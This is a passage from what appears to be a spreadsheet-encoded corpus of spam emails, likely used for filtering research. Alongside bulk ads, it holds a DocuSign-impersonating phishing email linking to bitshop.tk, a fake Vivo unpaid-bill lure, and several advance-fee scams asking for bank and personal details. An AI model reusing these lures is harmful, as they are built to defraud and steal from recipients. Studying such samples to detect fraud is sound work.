  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: DocuSign &lt;no-reply@bitshop.tk&gt;\nDate: Tue, 23 Oct 2018 13:30:11 +0000</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2018 13:30:11 +0000</t>
  </si>
  <si>
    <t>DocuSign &lt;no-reply@bitshop.tk&gt;</t>
  </si>
  <si>
    <t>Document Share</t>
  </si>
  <si>
    <t>[DocuSign] Document Activation VIEW [1] Please click the 'View' button to sign into your account and view the shared documents. Thank you for choosing DocuSign. DO NOT SHARE THIS EMAIL This email contains a secure link to DocuSign. Please do not share this email, link, or access code with others. ABOUT DOCUSIGN Sign documents electronically in just minutes. It's safe, secure, and legally binding. Whether you're in an office, at home, on-the-go -- or even across the globe -- DocuSign provides a professional trusted solution for Digital Transaction Management™. QUESTIONS ABOUT THE DOCUMENT? If you need to modify the document or have questions about the details in the document, please reach out to the sender by emailing them directly. If you are having trouble signing the document, please visit the Help with Signing [2] page on our Support Center [3]. Download the DocuSign App [4] Links: ------ [1] [URL]http://bitshop.tk[/URL] [2] [URL]http://bitshop.tk[/URL] [3] [URL]http://bitshop.tk[/URL] [4] [URL]http://bitshop.tk[/URL] Document Share  Document Activation   VIEW  Please click the 'View' button to sign into your account and view the shared documents. Thank you for choosing DocuSign. Do Not Share This Email This email contains a secure link to DocuSign. Please do not share this email, link, or access code with others. About DocuSign Sign documents electronically in just minutes. It's safe, secure, and legally binding. Whether you're in an office, at home, on-the-go -- or even across the globe -- DocuSign provides a professional trusted solution for Digital Transaction Management™.  Questions about the Document? If you need to modify the document or have questions about the details in the document, please reach out to the sender by emailing them directly. If you are having trouble signing the document, please visit the Help with Signing page on our Support Center. Download the DocuSign App</t>
  </si>
  <si>
    <t>http://bitshop.tk http://bitshop.tk http://bitshop.tk http://bitshop.tk</t>
  </si>
  <si>
    <t>HKG</t>
  </si>
  <si>
    <t>891</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: Vivo &lt;sac14315@vivo.com.br&gt;\nDate: Tue, 23 Oct 2018 12:45:56 +0000 (UTC)</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2018 12:45:56 +0000 (UTC)</t>
  </si>
  <si>
    <t>Vivo &lt;sac14315@vivo.com.br&gt;</t>
  </si>
  <si>
    <t>Prezado(a), jose@monkey.org  - Sua Fatura Vivo Movel Esta em Aberto</t>
  </si>
  <si>
    <t>Prezado Cliente,Acreditamos que tenha ocorrido algum imprevisto com o pagamento de sua conta, pois identificamos                                                         em nosso sistema que h valores em aberto relacionado ao seu CPF/CNPJ. Ms Referente: Setembro/2018 Vencimento da conta: 05/09/2018Encargos devidos: R$ 280,36 Observao: Se necessario efetuaremos a cobrana via dbito automtico DDA, em sua conta, para evitar o bloqueio de sua linha/servios.  Cobrana Vivo:    Demonstrativo Fat. 06/2018     Para mais detalhes:   Acesse aqui os detalhes de sua Pendncia.    ATENO: Para melhor visualizao abrir a partir de um computador (Windows). Central de Relacionamento com o Cliente Vivo[URL]www.vivo.com.br[/URL] anexo ao e-mail</t>
  </si>
  <si>
    <t>www.vivo.com.br</t>
  </si>
  <si>
    <t>1001</t>
  </si>
  <si>
    <t>To: nan\nFrom: wangqin &lt;wangqin_86@3xl.net&gt;\nDate: Tue, 23 Nov 2004 01:38:27 -0600</t>
  </si>
  <si>
    <t>Tue, 23 Nov 2004 01:38:27 -0600</t>
  </si>
  <si>
    <t>wangqin &lt;wangqin_86@3xl.net&gt;</t>
  </si>
  <si>
    <t>\nHANG SENG BANK LTD.\nDES VOEUX RD. BRANCH,\nCENTRAL HONG KONG,\nHONG KONG.\n\nDear Sir,\n\n   Let me start by introducing myself. I am Mr. Wang Qin credit officer of the Hang Seng Bank Ltd.  I have a concealed business suggestion for you.Before the U.S and Iraqi war our client General. Ibrahim Moussa who was with the Iraqi forces and also business man made a numbered fixed deposit for 18 calendar months, with a value of Twenty millions Five Hundred Thousand United State Dollars only in my branch.  Upon maturity several notice was sent to him, even during the war early this year. Again after the war  another notification was sent and still no response came from him. We later find out that the General and his family had been killed during the war in bomb blast that hit their home.After further investigation it was also discovered that Gen. Ibrahim Moussa did not declare any next of kin in his official papers including the paper work of his bank deposit. And he also confided in me the last time he was at my office \nthat no one except me knew of his deposit in my bank.\n So, Twenty millions Five Hundred Thousand United State Dollars is still lying in my bank and no one will ever come forward to claim it. What bothers me most is that according to the to the laws of my country at the expiration 4years the funds will revert to the ownership of the Hong Kong Government if nobody applies to claim the funds.Against this backdrop, my suggestion to you is that I will like youas a foreigner to stand as the next of kin to Gen. Ibrahim Moussa so that you will be able to receive his funds.\n \nWHAT IS TO BE DONE:\n\nI want you to know that I have had everything planned out so that we shall come out successful. I have contacted an attorney that will prepare the necessary document that will back you up as the next of kin to Gen. Ibrahim Moussa, all that is required from you at this stage is for you to provide me with your Full Names and Address so that the attorney can commence his job. After you have been made the next of kin, the attorney will also fill in for claims on your behalf and secure the necessary approval and letter of probate in your favor for the move of the funds to an account that will be provided by you. \n There is no risk involved at all in the matter as weare going adopt alegalized method and the attorney will prepare all the necessary documents. Please endeavor to observe utmost discretion in all matters concerning this issue.Once the funds have been transferred to your nominated bankaccount we shall share in the ratio of 70% for me, 25% for you and 5% for anyexpenses incurred during the course of this operation. Should you be interested please send me your private phone and fax numbers for easy communication and I will provide you with more details of this operation. Your earliest response to this letter will be appreciated.\n\nKind Regards,\n\nMr. Wang  Qin\n\n\n\n___________________________________________________________________________\nMail sent from WebMail service at PHP-Nuke Powered Site torrentgods.comr\n- [URL]http://torrentgods.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://torrentgods.com</t>
  </si>
  <si>
    <t>2108</t>
  </si>
  <si>
    <t>To: mustafa_joseph01@latinmail.com &lt;mustafa_joseph01@latinmail.com&gt;\nFrom: mustafa joseph &lt;mustafa_joseph01@latinmail.com&gt;\nDate: Tue, 23 May 2006 13:41:21 +0200</t>
  </si>
  <si>
    <t>Tue, 23 May 2006 13:41:21 +0200</t>
  </si>
  <si>
    <t>mustafa joseph &lt;mustafa_joseph01@latinmail.com&gt;</t>
  </si>
  <si>
    <t>mustafa_joseph01@latinmail.com &lt;mustafa_joseph01@latinmail.com&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF MR. MUSTAFA JOSEPH</t>
  </si>
  <si>
    <t>FROM THE DESK OF MR. MUSTAFA JOSEPH\nBILL AND EXCHANGE MANAGER\nAFRICAN DEVELOPMENT BANK\nOUAGADOUGOU, BURKINA FASO\n\n\nI AM THE MANAGER OF BILL AND EXCHANGE AT THE FOREIGN REMITTANCE DEPARTMENT OF AFRICAN DEVELOPMENT BANK BURKINA FASO. I GOT YOUR CONTACT ADDRESS THROUGH INTERNET NET WORK SEARCH WHEN SEARCHING FOR A GOOD AND RELIABLE PERSON THAT WILL ASSIST ME IN THIS TRANSACTION.\n\nIN MY DEPARTMENT WE DISCOVERED AN ABANDONED SUM OF 22.85M US DOLLARS (\nTWENTY TWO MILLLION EIGHT HUNDRED AND FIFTY THOUSAND US DOLLARS)IN AN\nACCOUNT THATBELONGS TO ONE OF OUR FOREIGN CUSTOMER WHO DIED ON 25TH JULY 2000 IN SUPER SONIC CONCORDE PLANE CRASH AT CHARLES DE GAULLE AIRPORT IN PARIS FRANCE ALONG WITH HIS ENTIRE FAMILY.\n\nSINCE WE GOT INFORMATION ABOUT HIS DEATH, WE HAVE BEEN EXPECTING HIS NEXT\nOF KIN TO COME OVER AND CLAIM HIS MONEY BECAUSE WE CANNOT RELEASE IT\nUNLESS SOMEBODY APPLIES FOR IT AS NEXT OF KIN OR RELATION TO THE DECEASED\nAS INDICATED IN OUR BANKING GUI DELINES BUT UNFORTUNATELY WE LEARNT THAT\nALL HIS SUPPOSED NEXT OF KIN OR RELATION DIED ALONGSIDE WITH HIM AT THE PLANE CRASH LEAVING NOBODY BEHIND FOR THE CLAIM. IT IS THEREFORE UPON THIS DISCOVERY THAT I DECIDED TO MAKE THIS BUSINESS PROPOSAL TO YOU AND RELEASE THE MONEY TO YOU AS THE NEXT OF KIN OR RELATION TO THE DECEASED FOR SAFETY AND SUBSEQUENT DISBURSEMENT SINCE NOBODY IS COMING FOR IT AND I DON'T WANT THIS MONEY TO GO INTO THE BANK TREASURY AS UNCLAIMED BILL.\n\nTHE BANKING LAW AND GUIDELINE HERE STIPULATES THAT IF SUCH MONEY REMAINED\nUNCLAMED AFTER SEVEN YEAR, THE MONEY WILL BE TRANSFERED INTO THE BANK\nTREASURY AS UNCLAIMED FUND.\n\nTHE REQUEST OF FOREIGNER AS NEXT OF KIN IN THIS BUSINESS IS OCCASIONED BY\nTHE FACT THAT THE CUSTOMER WAS A FOREIGNER AND A BURKINABE CANNOT STAND AS NEXT OF KIN TO A FOREIGNER.\n\nI AGREE THAT 30% OF THIS MONEY WILL BE FOR YOU AS FOREIGN PARTNER, IN\nRESPECT TO THE PROVISION OF A FOREIGN ACCOUNT AND 70% W OULD BE FOR ME;\n\nTHEREFORE TO ENABLE THE IMMEDIATE TRANSFER OF THIS FUND TO YOU AS\nARRANGED, YOU MUST APPLY FIRST TO THE BANK AS RELATIONS OR NEXT OF KIN OF\nTHE DECEASED INDICATING YOUR BANK NAME, YOUR BANK ACCOUNT NUMBER, YOUR\nPRIVATE TELEPHONE AND FAX NUMBER FOR EASY AND EFFECTIVE COMMUNICATION AND LOCATION WHERE IN  THE MONEY WILL BE REMITTED.\n\nUPON RECEIPT OF YOUR REPLY, I WILL SEND TO YOU BY FAX OR EMAIL THE TEXT OF\nTHE APPLICATION. I WILL NOT FAIL TO BRING TO YOUR NOTICE THAT THIS\nTRANSACTION IS HITCH FREE AND THAT YOU SHOULD NOT ENTERTAIN ANY ATOM OF\nFEAR AS ALL REQUIRED ARRANGEMENTS HAVE BEEN MADE FOR THE TRANSFER.\n\nYOU SHOULD CONTACT ME IMMEDIATELY AS SOON AS YOU RECEIVE THIS MAIL   THROUGH\nMY  PRIVATE LINE  22676 08 66 92\nYOUR'S FAITHFULLY\nMR. MUSTAFA JOSEPH\n\n\n\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>5426</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: "Digital Mortgage" &lt;rates@digitalmortgage.cc&gt;\nDate: Tue, 23 Jul 2002 22:56:33 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 22:56:33 -0400 (EDT)</t>
  </si>
  <si>
    <t>"Digital Mortgage" &lt;rates@digitalmortgage.cc&gt;</t>
  </si>
  <si>
    <t>Free Mortgage Quotes</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_0012_01C1E216.45376260 Content-Type: text/plain; 	charset="iso-8859-1" Content-Transfer-Encoding: 8bit Let the Banks Complete for Your Mortgage or Loan. It's as easy as 1-2-3! Programs for EVERY credit situation Borrow up to 125% of your home value Special programs for self-employed No income verification programs Free Mortgage Loan Analysis. No obligation! 1.Fill in the short form Lender reply within 24 hrs. 2.You will receive the lowest offers from qualified mortgage bankers within 24 hours. 3.Then, you decide!!! You receive quotes with no cost or obligation. Let's Get Started!!! [URL]http://www.digitalmortgage.cc[/URL] All information is confidential and won't be sold or distributed to anyone. To remove please follow: [URL]http://www.digitalmortgage.cc[/URL] ------=_NextPart_000_0012_01C1E216.45376260 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Free Mortgage Quotes Let the Banks Complete for=  Your Mortgage or Loan.It's as easy as=  1-2-3! P= rograms for EVERYcredit situation1.Fill in the short formLender reply wit= hin 24 hrs. 2.Y= ou will receive the lowestoffers from qualified mortgagebankers=  within 24 hours&lt;= a href=3D"[URL]http://digitalmortgage.cc[/URL]"&gt;Borrow up to 125%of your home value 3.Then, you decide= !!! You receivequotes with no cost or obligation.Special=  programsfor self-employed Let'= s Get Started!!!No income verification programs Free Mortgage=  Loan Analysis. No obligation!All information=  is confidential and won't be sold or distributed to anyone.To unsu= bscribe click here ------=_NextPart_000_0012_01C1E216.45376260--</t>
  </si>
  <si>
    <t>http://www.digitalmortgage.cc http://www.digitalmortgage.cc http://digitalmortgage.cc</t>
  </si>
  <si>
    <t>5411</t>
  </si>
  <si>
    <t>To: cypherpunks@einstein.ssz.com\nFrom: "Special Deals" &lt;unsubs-ab749eca98-cypherpunks=einstein.ssz.com@b.verticalresponse.com&gt;\nDate: Tue, 23 Jul 2002 22:32:44 +0000</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 22:32:44 +0000</t>
  </si>
  <si>
    <t>"Special Deals" &lt;unsubs-ab749eca98-cypherpunks=einstein.ssz.com@b.verticalresponse.com&gt;</t>
  </si>
  <si>
    <t>Take Action Immediately or Miss Out.</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. --__________MIMEboundary__________ Content-Type: text/plain Content-Transfer-Encoding: 7bit That's right! For a limited time, you are eligible to receive up to 4, yes four, Satellite TV receivers at absolutely NO COST from EliteDish As an added bonus, your first 3 months of Service will be free.  3 months..... Just think about what you could do with that extra money...... You must act now! Click Here to Apply:  [URL]http://r.vresp.com[/URL] or call us 1-800-823-2466   Sign up today and receive FREE Installation and guess what? Your first 3 months of programming are paid! Equipment, Installation and Programming at NO COST to you! Drop Cable go for Digital Entertainment.  If your paying for cable,  your paying too much.  Want proof? Look at what you will  receive with our Satellite package.  Here is what you qualify for:   -FREE complete Satellite TV System (up to 4 rooms)   -FREE Professional Installation (anywhere in the USA)   -FREE 3 Months of Programming at no cost.   -FREE In Home Service Plan   -Over 170 channels to watch and hundreds of Pay-Per-View movies.     That's it! No hidden Charges. 100% Satisfaction Guarantee.   Click Here to Apply: [URL]http://r.vresp.com[/URL] ______________________________________________________________________ You have signed up with one of our network partners to receive email providing you with special offers that may appeal to you. If you do not wish to receive these offers in the future, reply to this email with "unsubscribe" in the subject or simply click on the following link: [URL]http://unsubscribe.verticalresponse.com[/URL] --__________MIMEboundary__________ Content-Type: text/html Content-Transfer-Encoding: 7bit   Claim Your FREE Satellite TV System                              003-300299717499832716 ATTENTION! Valued            Customer# 772-00D87 "Claim your FREE Systems"           or call 1-800-823-2466         Congratulations! YOU                  HAVE BEEN SELECTED TO RECEIVE A FREE*                  4 Receiver DISH Satellite Entertainment System! Risk Free.                  Click Here to Schedule your Free Installation ($446.00 value). This                  is a special, limited-time offer with no hidden costs. Order                  today and receive 3 months of programming FREE.  Hurry                  Offer Expires FRIDAY July 26th           Here's            what you'll get: -1            20 inch dish           -4 satellite receivers (four rooms)           -access card           -4 remote controls           -owner's manual           -Professional Installation                   You have signed up with one of our network partners to receive email providing you with special offers that may appeal to you. If you do not wish to receive these offers in the future, reply to this email with "unsubscribe" in the subject or simply click on the following link: Unsubscribe --__________MIMEboundary__________-- .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r.vresp.com http://r.vresp.com http://unsubscribe.verticalresponse.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5410</t>
  </si>
  <si>
    <t>To: "Friend" &lt;cypherpunks@einstein.ssz.com&gt;\nFrom: "Only the Best" &lt;OnlyTheBest_______r-7552100-339@mm53.com&gt;\nDate: Tue, 23 Jul 2002 22:11:25 UT</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 22:11:25 UT</t>
  </si>
  <si>
    <t>"Only the Best" &lt;OnlyTheBest_______r-7552100-339@mm53.com&gt;</t>
  </si>
  <si>
    <t>Friend, Great News from PetCareRx.com</t>
  </si>
  <si>
    <t>whole ad   Remove yourself from this recurring list by: Clicking here to send a blank email to unsub-7552100-339@mm53.com OR Sending a postal mail to CustomerService, 427-3 Amherst Street, Suite 319, Nashua, NH 03063 This message was sent to address cypherpunks@einstein.ssz.com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451</t>
  </si>
  <si>
    <t>To: &lt;wngnuts@aol.com&gt;\nFrom: "Stephanie" &lt;qe2caps1n9683@hotmail.com&gt;\nDate: Tue, 23 Jul 2002 21:41:52 -1900</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 21:41:52 -1900</t>
  </si>
  <si>
    <t>"Stephanie" &lt;qe2caps1n9683@hotmail.com&gt;</t>
  </si>
  <si>
    <t>&lt;wngnuts@aol.com&gt;</t>
  </si>
  <si>
    <t>Free Term Life Insurance Quotes                 LGJDG</t>
  </si>
  <si>
    <t>Save up to 75% on your Term Life Insurance!  \n_Compare rates from top insurance companies around the country_  \n  \n**In our life and times, it's important to plan for your family's future,\nwhile  \nbeing comfortable financially. Choose the right Life Insurance policy today.\n\n_Click the link below to compare the lowest rates and save up to 75%_**\n\n**COMPARE YOUR COVERAGE**\n\nYou'll be able to compare rates and get a free application in _less than a\nminute!_\n\n***Get your FREE instant quotes...  \n*Compare the lowest prices, then...  \n*Select a company and Apply Online.**\n\n**GET A FREE QUOTE NOW!**  \n_You can't predict the future, but you can always prepare for it._  \n---|---  \n  \n  \n\n  \n  \nto be excluded from future contacts\n\nkideesh \--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423</t>
  </si>
  <si>
    <t>To: fork@vpi.net\nFrom: KevinMitchellson381912@yahoo.com\nDate: Tue, 23 Jul 2002 21:14:31 -0500</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 21:14:31 -0500</t>
  </si>
  <si>
    <t>KevinMitchellson381912@yahoo.com</t>
  </si>
  <si>
    <t>fork@vpi.net</t>
  </si>
  <si>
    <t>in under 1 minute - we can beat your current rate 38191297</t>
  </si>
  <si>
    <t>\n\n&gt; **_" Now is the time to take advantage of falling interest rates! There is\n&gt; no advantage in waiting any longer."_**  \n&gt;  \n&gt;  Refinance or consolidate high interest credit card debt into a low interest\n&gt; mortgage. Mortgage interest is tax deductible, whereas credit card interest\n&gt; is not.  \n&gt;  \n&gt;  You can save thousands of dollars over the course of your loan with just a\n&gt; 0.25% drop in your rate!  \n&gt;  \n&gt;  Our nationwide network of lenders have hundreds of different loan programs\n&gt; to fit your current situation:\n&gt;\n\n&gt;&gt; **\n\n&gt;&gt;\n\n&gt;&gt;   * Refinance\n\n&gt;&gt;   * Second Mortgage\n\n&gt;&gt;   * Debt Consolidation\n\n&gt;&gt;   * Home Improvement\n\n&gt;&gt;   * Purchase\n\n&gt;&gt;\n\n**\n\n&gt;\n&gt; Let us do the shopping for you...IT IS FREE!  \n&gt;  CLICK HERE"\n&gt;\n&gt;  \n&gt;  **Please CLICK HERE  to fill out a quick form. Your request will be\n&gt; transmitted to our network of mortgage specialists who will respond with up\n&gt; to three independent offers.**  \n&gt;  \n&gt;  **This service is 100% free to home owners and new home buyers without any\n&gt; obligation.**\n&gt;\n&gt; **Visit the website to be taken out of this database.**\n\n|  \n  \n| National Averages  \n---  \n_Program_ | _Rate_  \n30Year Fixed | 6.375%  \n15Year Fixed | 5.750%  \n5Year Balloon | 5.250%  \n1/1Arm | 4.250%  \n5/1Arm | 5.625%  \nFHA30 Year Fixed | 6.500%  \nVA 30 Year Fixed | 6.500%  \n  \n\n" _You did all the shopping for me. Thank you!_  \n**- T. N. Cap. CA**\n\n" _..You helped me finance a new home and I got a very good deal._  \n**- R. H. H. CA**  \n\n" _..it was easy, and quick...!_  \n**- V. S. N. P. WA**  \n  \n\n38191297 [URL]http://xent.com[/URL]\n\n</t>
  </si>
  <si>
    <t>5419</t>
  </si>
  <si>
    <t>To: &lt;Undisclosed.Recipients@netnoteinc.com&gt;\nFrom: 011696aaa002@mail.com\nDate: Tue, 23 Jul 2002 20:00:36 -0500</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 20:00:36 -0500</t>
  </si>
  <si>
    <t>011696aaa002@mail.com</t>
  </si>
  <si>
    <t>Ultimate HGH: Make you look and feel 20 YEARS YOUNGER!15373</t>
  </si>
  <si>
    <t>As seen on NBC, CBS, CNN, and even Oprah! The health discovery that actuallyreverses aging while burning fat, without dieting or exercise! This provendiscovery has even been reported on by the New England Journal of Medicine.Forget aging and dieting forever! And it's Guaranteed! \n\nClick below to enter our web site:\n[URL]http://www205.wiildaccess.com[/URL]\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Click below to enter our web site:\n[URL]http://www205.wiildaccess.com[/URL]\n\n\n**************************************************\nIf you want to get removed\nfrom our list please email at- standardoptout@x263.net (subject=remove "your email")\n**************************************************</t>
  </si>
  <si>
    <t>http://www205.wiildaccess.com http://www205.wiildaccess.com</t>
  </si>
  <si>
    <t>5416</t>
  </si>
  <si>
    <t>To: tatinhalove@einstein.ssz.com\nFrom: trysweetangel29410 &lt;ka88333@mailru.com&gt;\nDate: Tue, 23 Jul 2002 19:25:01 -0500</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 19:25:01 -0500</t>
  </si>
  <si>
    <t>trysweetangel29410 &lt;ka88333@mailru.com&gt;</t>
  </si>
  <si>
    <t>tatinhalove@einstein.ssz.com</t>
  </si>
  <si>
    <t>Free $$$ For Business Or Personal cwfqt</t>
  </si>
  <si>
    <t>START A BUSINESS OR FUND YOUR CHILD'S COLLEGE WITHOUT DEBT.\n\nGet the money you need and NEVER have to pay it back.\nStarting a business or putting your child through college is an expensive \nundertaking. That's where we can Help. Our valuable ebook will \nput you in touch with thousands of programs to help you get the money \nyou need. That's right FREE Grant &amp; Scholarship Money.\nDon't Let Someone Else Get YOUR Share!\n\nReg. Price $34.95     Order by July 31 and SAVE $10.00. \n\nTour our SECURE website for more details: \n[URL]http://www.moneyfromthetree.com[/URL] \n\nYou are receiving this special offer because you have provided permission \nto receive third party online promotions.  To be eliminated from future marketing:\n[URL]http://www.moneyfromthetree.com[/URL]\n\nrcbvlirnuibhhejdtjdpjyogjdeyrklxvrjwo\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www.moneyfromthetree.com http://www.moneyfromthetree.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5414</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - AIG" &lt;aig@insurancemail.net&gt;\nDate: Tue, 23 Jul 2002 19:02:53 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 19:02:53 -0400</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_14FD9B_01C23266.747F2DA0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: quoted-printable  	 When AIG talks annuities...your clients listen!=09  	 Year 1: 8.90% Guaranteed=0A= Year 2-6: 4.90% Guaranteed=09  =09  Commission: 9%=09  	=20 Call or e-mail   us Today!  888-237-4210 ? or ?=20 Please fill out the form below for more information	=20 Name:	  =09 E-mail:	  =09 Phone:	  =09 City:	  	State:	  	 =09  	  	 	   =09 =20 =20  AIG Annuity For agent use only.=20 We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL] =20 Legal Notice  =20 ------=_NextPart_000_14FD9B_01C23266.747F2DA0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable 9% Commission on MYG Annuities =20      =20            =20                  =20                  =20                  =20              =20            Call or e-mail us Today!             — or — =20              =20                  =20                      =20                         Please = fill out the form below for more information =20                         Name:  =20                            =20                         E-mail:  =20                            =20                         Phone:  =20                            =20                         City:  =20                            State:  =20                            =20                            =20                               =20                                          For agent use only.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14FD9B_01C23266.747F2DA0--</t>
  </si>
  <si>
    <t>5444</t>
  </si>
  <si>
    <t>To: &lt;embrionic@yahoo.com&gt;\nFrom: "Kathryn" &lt;le2sikf4r8683@hotmail.com&gt;\nDate: Tue, 23 Jul 2002 18:35:24 -1900</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 18:35:24 -1900</t>
  </si>
  <si>
    <t>"Kathryn" &lt;le2sikf4r8683@hotmail.com&gt;</t>
  </si>
  <si>
    <t>&lt;embrionic@yahoo.com&gt;</t>
  </si>
  <si>
    <t>Save up to 75% on Term Life...                  LEKOT</t>
  </si>
  <si>
    <t>Save up to 75% on your Term Life Insurance!  \n_Compare rates from top insurance companies around the country_  \n  \n**In our life and times, it's important to plan for your family's future,\nwhile  \nbeing comfortable financially. Choose the right Life Insurance policy today.  \n  \n_Click the link below to compare the lowest rates and save up to 75%_**\n\n**COMPARE YOUR COVERAGE**\n\nYou'll be able to compare rates and get a free application in _less than a\nminute!_\n\n***Get your FREE instant quotes...  \n*Compare the lowest prices, then...  \n*Select a company and Apply Online.**\n\n**GET A FREE QUOTE NOW!**  \n_You can't predict the future, but you can always prepare for it._  \n  \n  \n\n  \n  \nto be excluded from future contacts\n\ncocol [URL]http://xent.com[/URL]\n\n</t>
  </si>
  <si>
    <t>5400</t>
  </si>
  <si>
    <t>To: FoRK@xent.com\nFrom: "Mr.Kenneth Uba" &lt;kennethuba@mail.com&gt;\nDate: Tue, 23 Jul 2002 18:24:57 +0200</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 18:24:57 +0200</t>
  </si>
  <si>
    <t>"Mr.Kenneth Uba" &lt;kennethuba@mail.com&gt;</t>
  </si>
  <si>
    <t>Urgent Business</t>
  </si>
  <si>
    <t>&gt;&gt;From the Desk of Mr. Kenneth Uba\n \nUnion Bank of Nigeria,\n \nLagos-Nigeria.\n \n \n \nATTN: THE PRESIDENT/C.E.O\n \nSTRICTLY A PRIVATE BUSINESS PROPOSAL\n \n \n \nDear Sir,\n \nI am Mr. Kenneth Uba, the manager bills and exchange\nat the Foreign Remittance Department of the Union Bank of Nigeria Plc. \n \nI am writing this letter to ask for your support and\ncooperation to carry out this business opportunity in my department. \n \nWe discovered an abandoned sum of $31,000,000.00 (Thirty One million United States Dollars only) in an account that belongs to one of our foreign customers who died along with his entire family of a wife and two children in November 1997 in a Plane crash.\n \n\n \nSince we heard of his death, we have been expecting his next-of-kin to come over and put claims for his money as the heir, because we cannot release the fund from his account unless someone applies for claim as\nthe next-of-kin to the deceased as indicated in our banking guidelines.\nUnfortunately, neither their family member nor distant relative has ever appeared to claim the said fund. \n \nUpon this discovery, I and other officials in my department have agreed to make business with you and release the total amount into your account as the heir of the fund since no one came for it or discovered he maintained account with our bank, otherwise the fund will be returned to the bank's treasury as unclaimed fund.\n \nWe have agreed that our ratio of sharing will be as stated thus; \n20 % for you as foreign partner, 75 % for us the officials in my department and 5 % for the settlement of all local and foreign expenses incurred by us and you during the course of this business.\n \n\nUpon the successful completion of this transfer, I and one of my colleagues will come to your country and mind our share. It is from our 75 % we intend to import Agricultural machineries into my country as a way of recycling the fund.  \n\nTo commence this transaction, we require you to immediately indicate your interest by a return e-mail and enclose your private contact telephone number, fax number full name and address and your designated\nbank coordinates to enable us file letter of claim to the appropriate departments for necessary approvals before the transfer can be made.\n\nNote also, this transaction must be kept STRICTLY CONFIDENTIAL because of its nature. \n \nI look forward to receiving your prompt response.\n \n \n \nMr. Kenneth Uba\n \nUnion Bank of Nigeria.\n \n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5399</t>
  </si>
  <si>
    <t>To: cpunks_anon@einstein.ssz.com\nFrom: CDR Anonymizer &lt;cpunks_anon@einstein.ssz.com&gt;\nDate: Tue, 23 Jul 2002 18:16:53 +0200</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 18:16:53 +0200</t>
  </si>
  <si>
    <t>CDR Anonymizer &lt;cpunks_anon@einstein.ssz.com&gt;</t>
  </si>
  <si>
    <t>cpunks_anon@einstein.ssz.com</t>
  </si>
  <si>
    <t>--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418</t>
  </si>
  <si>
    <t>To: &lt;InfoByTel@localhost.com&gt;\nFrom: "InfoBytel" &lt;special@busnweb.com&gt;\nDate: Tue, 23 Jul 2002 17:58:38 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 17:58:38 -0700</t>
  </si>
  <si>
    <t>"InfoBytel" &lt;special@busnweb.com&gt;</t>
  </si>
  <si>
    <t>&lt;InfoByTel@localhost.com&gt;</t>
  </si>
  <si>
    <t>Discover InfoByTel Today!</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_0021_01C23272.92934220 Content-Type: multipart/alternative; 	boundary="----=_NextPart_001_0022_01C23272.92934220" ------=_NextPart_001_0022_01C23272.92934220 Content-Type: text/plain; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable InfoByTel: Your Personal Sales Assistant!       =20       =20       =20         Discover InfoByTel!         Imagine having a Representative available to describe your = Product or Service precisely as you want, 24/7 and Never Missing a Call = from a prospective customer again!         InfoByTel will provide your prospects with a recorded = description of your product, service, property or business and offer an = opportunity to reach you by telephone immediately, send you a fax, or = leave a message requesting a response by telephone, fax or email.         At the same time your prospects utilize the interactive features = of InfoByTel; the system will create an instant online report of their = telephone number and time &amp; date of their call for you.=20         Listen to an Example         of InfoByTel @ Work!         Call: (949) 218-6150=20         Email InfoByTel Now=20         InfoByTel Distributor         Business Opportunity Hotline!         Call: (949) 218-6180         By calling this one number you may elect to be connected to a = representative. If a representative is not immediately available you = will have an opportunity to request a response by telephone, fax or = email.=20 ------------------------------------------------------------------------         This is a One-Time Email Presentation.=20         Your privacy is extremely important to us.  We are committed to = delivering a highly rewarding experience.  Your information was obtained = in good faith as an opt-in or permission email.  We do everything to = protect your privacy.  If you still wish to be assured that you will not = receive further email messages, please reply with the word "REMOVE" on = the subject line.=20         Thank You.=20         TO UNSUBSCRIBE OR UPDATE YOUR E-MAIL ADDRESS=20         You have received this e-mail because you have subscribed to or = asked for offers via email from our organization or another affiliate = that we may work with.  To unsubscribe, send an email to = special@busnweb.com.  To update your email address for future offers, = please "reply" with your correct contact information.         This e-mail message and its contents are copyrighted and are = proprietary products of Busnweb.com, Inc..  Copyright 2002 Busnweb.com, = Inc..  All rights reserved.=20         This message is being sent to you in compliance with the = proposed Federal legislation for commercial e-mail (S.1618 - SECTION = 301). "Pursuant to Section 301, Paragraph (a)(2)(C) of S. 1618, further = transmissions to you by the sender of this e-mail may 